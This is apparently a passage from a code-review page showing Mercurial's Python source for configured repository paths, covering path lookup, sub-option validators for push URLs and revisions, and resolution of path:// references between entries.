        # Populate the dict from the ``[paths]`` config section.
        dict.__init__(self)

        for name, loc in ui.configitems(b'paths', ignoresub=True):
            # No location is the same as not existing.
            if not loc:
                continue
            loc, sub_opts = ui.configsuboptions(b'paths', name)
            self[name] = path(ui, name, rawloc=loc, suboptions=sub_opts)

        # Resolve inter-path references once all entries exist.
        for name, p in sorted(self.items()):
            p.chain_path(ui, self)

    def getpath(self, ui, name, default=None):
        """Return a ``path`` from a string, falling back to default.

        ``name`` can be a named path or locations. Locations are filesystem
        paths or URIs.

        Returns None if ``name`` is not a registered path, a URI, or a local
        path to a repo.
        """
        # Only fall back to default if no path was requested.
        if name is None:
            if not default:
                default = ()
            elif not isinstance(default, (tuple, list)):
                default = (default,)
            for k in default:
                try:
                    return self[k]
                except KeyError:
                    continue
            return None

        # Most likely empty string.
        # This may need to raise in the future.
        if not name:
            return None

        try:
            return self[name]
        except KeyError:
            # Try to resolve as a local path or URI.
            try:
                # we pass the ui instance as a warning might need to be issued
                return path(ui, None, rawloc=name)
            except ValueError:
                raise error.RepoError(_(b'repository %s does not exist') % name)
540
547
541
548
# Registry of path sub-options: maps sub-option name to a
# ``(path attribute, validator callable)`` pair. Populated by the
# ``pathsuboption`` decorator.
_pathsuboptions = {}
543
550
544
551
def pathsuboption(option, attr):
    """Decorator used to declare a path sub-option.

    Arguments are the sub-option name and the attribute it should set on
    ``path`` instances.

    The decorated function will receive as arguments a ``ui`` instance,
    ``path`` instance, and the string value of this option from the config.
    The function should return the value that will be set on the ``path``
    instance.

    This decorator can be used to perform additional verification of
    sub-options and to change the type of sub-options.
    """

    def decorator(func):
        # Record both the target attribute and the validator for this option.
        _pathsuboptions[option] = (attr, func)
        return func

    return decorator
565
572
566
573
567 @pathsuboption(b'pushurl', b'pushloc')
574 @pathsuboption(b'pushurl', b'pushloc')
568 def pushurlpathoption(ui, path, value):
575 def pushurlpathoption(ui, path, value):
569 u = url(value)
576 u = url(value)
570 # Actually require a URL.
577 # Actually require a URL.
571 if not u.scheme:
578 if not u.scheme:
572 ui.warn(_(b'(paths.%s:pushurl not a URL; ignoring)\n') % path.name)
579 ui.warn(_(b'(paths.%s:pushurl not a URL; ignoring)\n') % path.name)
573 return None
580 return None
574
581
575 # Don't support the #foo syntax in the push URL to declare branch to
582 # Don't support the #foo syntax in the push URL to declare branch to
576 # push.
583 # push.
577 if u.fragment:
584 if u.fragment:
578 ui.warn(
585 ui.warn(
579 _(
586 _(
580 b'("#fragment" in paths.%s:pushurl not supported; '
587 b'("#fragment" in paths.%s:pushurl not supported; '
581 b'ignoring)\n'
588 b'ignoring)\n'
582 )
589 )
583 % path.name
590 % path.name
584 )
591 )
585 u.fragment = None
592 u.fragment = None
586
593
587 return bytes(u)
594 return bytes(u)
588
595
589
596
590 @pathsuboption(b'pushrev', b'pushrev')
597 @pathsuboption(b'pushrev', b'pushrev')
591 def pushrevpathoption(ui, path, value):
598 def pushrevpathoption(ui, path, value):
592 return value
599 return value
593
600
594
601
595 class path(object):
602 class path(object):
596 """Represents an individual path and its configuration."""
603 """Represents an individual path and its configuration."""
597
604
598 def __init__(self, ui, name, rawloc=None, suboptions=None):
605 def __init__(self, ui, name, rawloc=None, suboptions=None):
599 """Construct a path from its config options.
606 """Construct a path from its config options.
600
607
601 ``ui`` is the ``ui`` instance the path is coming from.
608 ``ui`` is the ``ui`` instance the path is coming from.
602 ``name`` is the symbolic name of the path.
609 ``name`` is the symbolic name of the path.
603 ``rawloc`` is the raw location, as defined in the config.
610 ``rawloc`` is the raw location, as defined in the config.
604 ``pushloc`` is the raw locations pushes should be made to.
611 ``pushloc`` is the raw locations pushes should be made to.
605
612
606 If ``name`` is not defined, we require that the location be a) a local
613 If ``name`` is not defined, we require that the location be a) a local
607 filesystem path with a .hg directory or b) a URL. If not,
614 filesystem path with a .hg directory or b) a URL. If not,
608 ``ValueError`` is raised.
615 ``ValueError`` is raised.
609 """
616 """
610 if not rawloc:
617 if not rawloc:
611 raise ValueError(b'rawloc must be defined')
618 raise ValueError(b'rawloc must be defined')
612
619
613 # Locations may define branches via syntax <base>#<branch>.
620 # Locations may define branches via syntax <base>#<branch>.
614 u = url(rawloc)
621 u = url(rawloc)
615 branch = None
622 branch = None
616 if u.fragment:
623 if u.fragment:
617 branch = u.fragment
624 branch = u.fragment
618 u.fragment = None
625 u.fragment = None
619
626
620 self.url = u
627 self.url = u
621 # the url from the config/command line before dealing with `path://`
628 # the url from the config/command line before dealing with `path://`
622 self.raw_url = u.copy()
629 self.raw_url = u.copy()
623 self.branch = branch
630 self.branch = branch
624
631
625 self.name = name
632 self.name = name
626 self.rawloc = rawloc
633 self.rawloc = rawloc
627 self.loc = b'%s' % u
634 self.loc = b'%s' % u
628
635
629 self._validate_path()
636 self._validate_path()
630
637
631 _path, sub_opts = ui.configsuboptions(b'paths', b'*')
638 _path, sub_opts = ui.configsuboptions(b'paths', b'*')
632 self._own_sub_opts = {}
639 self._own_sub_opts = {}
633 if suboptions is not None:
640 if suboptions is not None:
634 self._own_sub_opts = suboptions.copy()
641 self._own_sub_opts = suboptions.copy()
635 sub_opts.update(suboptions)
642 sub_opts.update(suboptions)
636 self._all_sub_opts = sub_opts.copy()
643 self._all_sub_opts = sub_opts.copy()
637
644
638 self._apply_suboptions(ui, sub_opts)
645 self._apply_suboptions(ui, sub_opts)
639
646
640 def chain_path(self, ui, paths):
647 def chain_path(self, ui, paths):
641 if self.url.scheme == b'path':
648 if self.url.scheme == b'path':
642 assert self.url.path is None
649 assert self.url.path is None
643 try:
650 try:
644 subpath = paths[self.url.host]
651 subpath = paths[self.url.host]
645 except KeyError:
652 except KeyError:
646 m = _(b'cannot use `%s`, "%s" is not a known path')
653 m = _(b'cannot use `%s`, "%s" is not a known path')
647 m %= (self.rawloc, self.url.host)
654 m %= (self.rawloc, self.url.host)
648 raise error.Abort(m)
655 raise error.Abort(m)
649 if subpath.raw_url.scheme == b'path':
656 if subpath.raw_url.scheme == b'path':
650 m = _(b'cannot use `%s`, "%s" is also defined as a `path://`')
657 m = _(b'cannot use `%s`, "%s" is also defined as a `path://`')
651 m %= (self.rawloc, self.url.host)
658 m %= (self.rawloc, self.url.host)
652 raise error.Abort(m)
659 raise error.Abort(m)
653 self.url = subpath.url
660 self.url = subpath.url
654 self.rawloc = subpath.rawloc
661 self.rawloc = subpath.rawloc
655 self.loc = subpath.loc
662 self.loc = subpath.loc
656 if self.branch is None:
663 if self.branch is None:
657 self.branch = subpath.branch
664 self.branch = subpath.branch
658 else:
665 else:
659 base = self.rawloc.rsplit(b'#', 1)[0]
666 base = self.rawloc.rsplit(b'#', 1)[0]
660 self.rawloc = b'%s#%s' % (base, self.branch)
667 self.rawloc = b'%s#%s' % (base, self.branch)
661 suboptions = subpath._all_sub_opts.copy()
668 suboptions = subpath._all_sub_opts.copy()
662 suboptions.update(self._own_sub_opts)
669 suboptions.update(self._own_sub_opts)
663 self._apply_suboptions(ui, suboptions)
670 self._apply_suboptions(ui, suboptions)
664
671
665 def _validate_path(self):
672 def _validate_path(self):
666 # When given a raw location but not a symbolic name, validate the
673 # When given a raw location but not a symbolic name, validate the
667 # location is valid.
674 # location is valid.
668 if (
675 if (
669 not self.name
676 not self.name
670 and not self.url.scheme
677 and not self.url.scheme
671 and not self._isvalidlocalpath(self.loc)
678 and not self._isvalidlocalpath(self.loc)
672 ):
679 ):
673 raise ValueError(
680 raise ValueError(
674 b'location is not a URL or path to a local '
681 b'location is not a URL or path to a local '
675 b'repo: %s' % self.rawloc
682 b'repo: %s' % self.rawloc
676 )
683 )
677
684
678 def _apply_suboptions(self, ui, sub_options):
685 def _apply_suboptions(self, ui, sub_options):
679 # Now process the sub-options. If a sub-option is registered, its
686 # Now process the sub-options. If a sub-option is registered, its
680 # attribute will always be present. The value will be None if there
687 # attribute will always be present. The value will be None if there
681 # was no valid sub-option.
688 # was no valid sub-option.
682 for suboption, (attr, func) in pycompat.iteritems(_pathsuboptions):
689 for suboption, (attr, func) in pycompat.iteritems(_pathsuboptions):
683 if suboption not in sub_options:
690 if suboption not in sub_options:
684 setattr(self, attr, None)
691 setattr(self, attr, None)
685 continue
692 continue
686
693
687 value = func(ui, self, sub_options[suboption])
694 value = func(ui, self, sub_options[suboption])
688 setattr(self, attr, value)
695 setattr(self, attr, value)
689
696
690 def _isvalidlocalpath(self, path):
697 def _isvalidlocalpath(self, path):
691 """Returns True if the given path is a potentially valid repository.
698 """Returns True if the given path is a potentially valid repository.
692 This is its own function so that extensions can change the definition of
699 This is its own function so that extensions can change the definition of
693 'valid' in this case (like when pulling from a git repo into a hg
700 'valid' in this case (like when pulling from a git repo into a hg
694 one)."""
701 one)."""
695 try:
702 try:
696 return os.path.isdir(os.path.join(path, b'.hg'))
703 return os.path.isdir(os.path.join(path, b'.hg'))
697 # Python 2 may return TypeError. Python 3, ValueError.
704 # Python 2 may return TypeError. Python 3, ValueError.
698 except (TypeError, ValueError):
705 except (TypeError, ValueError):
699 return False
706 return False
700
707
701 @property
708 @property
702 def suboptions(self):
709 def suboptions(self):
703 """Return sub-options and their values for this path.
710 """Return sub-options and their values for this path.
704
711
705 This is intended to be used for presentation purposes.
712 This is intended to be used for presentation purposes.
706 """
713 """
707 d = {}
714 d = {}
708 for subopt, (attr, _func) in pycompat.iteritems(_pathsuboptions):
715 for subopt, (attr, _func) in pycompat.iteritems(_pathsuboptions):
709 value = getattr(self, attr)
716 value = getattr(self, attr)
710 if value is not None:
717 if value is not None:
711 d[subopt] = value
718 d[subopt] = value
712 return d
719 return d
General Comments 0
You need to be logged in to leave comments. Login now